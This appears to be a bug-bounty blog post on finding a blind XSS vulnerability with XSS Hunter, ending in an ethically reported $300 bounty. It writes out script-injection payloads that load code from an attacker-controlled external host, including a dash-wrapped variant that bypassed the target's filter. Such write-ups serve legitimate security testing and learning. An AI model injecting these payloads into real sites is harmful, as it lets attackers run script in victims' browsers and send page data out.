My First Blind XSS

4 months ago 21

First of all, this blog is just for educational purpose. I will not be responsible if you mess anything up

Blind XSS is quite similar to stored Cross-Site Scripting attack where the input provided by the attacker is saved or stored by the web server and this stored input is reflected in various other applications which are linked with each other. It only triggers when the attacker’s input is stored by the web server in a database and executed as a malicious script in another part of the application or another application.

Attackers or Hackers inject the malicious script or payload ‘blindly’ on some web pages without having any assurance that it will be executing. Web pages that are likely to save their payload into the database are the most important carrier for Blind XSS attacks.

There are some tools available on the Internet to find blind xss
1. Xsshunter
2. Burp collaborator
3. Knowxss

Now I’m gonna explain you the easiest way to find Blind XSS

Let’s start

According to me Xsshunter is the easiest way to find blind XSS

XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.

Best part of Xsshunter is that whenever your script fires you will get dedicated mail from xsshunter that your payload is fired at that endpoint

Let’s start step by step

Navigate to https://xsshunter.com/appCreate your accountAfter creation go to payloadsChoose any payload and go to your targetUse your payload in any field that you think may be vulnerable to Blind xsswhenever your payload fires you will get email

Now you know the working of xsshunter and now I’m gonna explain how I found blind XSS in a target

Once upon a time when I was trying to find bugs on a private program in hackerone. I tried many ways but no luck

I was trying on discussion form but still no luck
then I used one payload from xsshunter
I used this payload "><script src=//yoursubdomain.xss.ht></script>

But still same result

then I just stopped testing for the day

Next day I tried again with same payload
I copied the payload from Xsshunter
created a new discussion in my target
used that payload
when I paste my payload I decided to check in a page source

Finally I found where the problem lies
there was a blocking for such type of payloads

new payload : ---"><script src=//yoursubdomain.xss.ht></script>---

I only use these -- in both ends

copied that payload and paste in the discussion

BOOM it worked

I got many mails from xsshunter

Now for the best part, ethically reported this bug and got rewarded

Yahoooooooo I got 300$ 🥳🥳🥳🥳🥳🥳🥳🥳

Read Entire Article